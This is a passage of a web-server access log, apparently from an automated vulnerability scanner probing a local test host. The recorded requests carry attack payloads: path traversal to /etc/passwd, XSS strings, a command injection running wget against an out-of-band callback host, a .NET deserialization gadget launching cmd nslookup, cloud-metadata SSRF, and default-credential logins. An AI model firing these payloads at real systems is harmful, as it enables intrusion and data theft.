\x22type\x22:\x22EXEC\x22,\x0D\x0A \x22mbean\x22:\x22com.sun.management:type=HotSpotDiagnostic\x22,\x0D\x0A \x22operation\x22:\x22dumpHeap\x22,\x0D\x0A \x22arguments\x22:[\x0D\x0A \x22/tmp1234/test1.hprof\x22,\x0D\x0A 0\x0D\x0A ]\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /jolokia/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.074","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /svnserve.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.083","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"login=AEE&last_page=&username=admin&password=admin&submit=Login&JS_SWITCH=JS_ON","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ZMC_Admin_Login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.091","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /kvmlm2/index.dhtml?fname=&language=../../../../../../../../../../etc/passwd%00.jpg&lname=&sponsor=gdi&template=11 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.143","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-json/wp/v2/lesson/1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.104","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WebInterface/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.104","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mantisBT/verify.php?id=1&confirm_hash= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.297","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/53 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.284","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"imgSrc=a","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /lucee/admin/imgProcess.cfm?file=/whatever HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.156","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /whoAmI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.104","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/api/2/screens HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.148","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graphiql.css HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.244","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_travelbook&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.288","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ProtectManager/Logon HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.111","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/page-layout-builder/includes/layout-settings.php?layout_settings_id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.092","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /PRESENTATION/EPSONCONNECT HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.088","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"169.254.169.254","request":"GET http://169.254.169.254/opc/v1/instance HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.271","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.7z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.223","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?wpv-image=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.105","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /settings.php.save HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.253","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php-fpm.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.092","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fed.rpc.solo.io.GlooInstanceApi/ListClusterDetails HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.224","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"http://127.0.0.1/admin/", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /RASHTML5Gateway/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.088","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/54 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.089","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mantisbt-2.3.0/verify.php?id=1&confirm_hash= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.094","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"key=';`wget http://c9v8hn0smpv8c57g0t00rx7ezpgexbycc.oast.live`;#","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/login.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.097","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger/swagger-ui.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.233","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nginx_status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.094","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.bz2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.094","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.101","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"command=show webmaster user&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant.","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /WEB_VMS/LEVEL15/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.103","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/webcm?getpage=../html/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.107","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /settings.php.swp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.095","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.122","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fmlurlsvc/?=&url=https%3A%2F%2Fgoogle.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.126","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bugs/verify.php?confirm_hash=&id=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.119","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nginx-status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.111","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/api-docs/swagger.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.113","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/55 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.123","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /am/XUI/ HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.002","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/GetSrvInfo.exe HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.315","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"\x0D\x0A\x0D\x0A \x0D\x0A foo\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A 2\x0D\x0A \x0D\x0A <_comparison z:Id=\x224\x22 z:FactoryType=\x22a:DelegateSerializationHolder\x22 z:Type=\x22System.DelegateSerializationHolder\x22 z:Assembly=\x220\x22\x0D\x0A xmlns=\x22http://schemas.datacontract.org/2004/07/System.Collections.Generic\x22\x0D\x0A xmlns:a=\x22http://schemas.datacontract.org/2004/07/System\x22>\x0D\x0A \x0D\x0A mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A Compare\x0D\x0A \x0D\x0A \x0D\x0A System.String\x0D\x0A System.Comparison`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]\x0D\x0A \x0D\x0A Start\x0D\x0A \x0D\x0A System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\x0D\x0A System.Diagnostics.Process\x0D\x0A System.Func`3[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A System.Diagnostics.Process Start(System.String, System.String)\x0D\x0A System.Diagnostics.Process Start(System.String, System.String)\x0D\x0A 8\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A Int32 Compare(System.String, System.String)\x0D\x0A System.Int32 Compare(System.String, System.String)\x0D\x0A 8\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A 2\x0D\x0A \x0D\x0A /c nslookup c9v8hn0smpv8c57g0t00w8gsg87kxzdas.oast.live\x0D\x0A cmd\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /sitecore/shell/ClientBin/Reporting/Report.ashx HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.135","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.138","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"{\x22Type\x22:\x22SubscriptionConfirmation\x22,\x22Message\x22:\x22\x22,\x22SubscribeURL\x22:\x22https://rfi.nessus.org/rfi.txt\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /wp-content/plugins/w3-total-cache/pub/sns.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.140","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /s/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.300","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /settings.php.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.139","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.142","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /includes/.gitignore HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.124","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /adserver/www/delivery/lg.php?dest=http://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.242","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/api-docs/swagger.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.101","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/list HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.244","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/56 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.107","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.112","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /external_content/retrieve/oembed?endpoint=http://c9v8hn0smpv8c57g0t00fgddwszfexqn7.oast.live&url=foo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.113","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /centreon/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.112","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /access/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.118","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sync/dropbox/download?challenge=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.095","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.092","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like 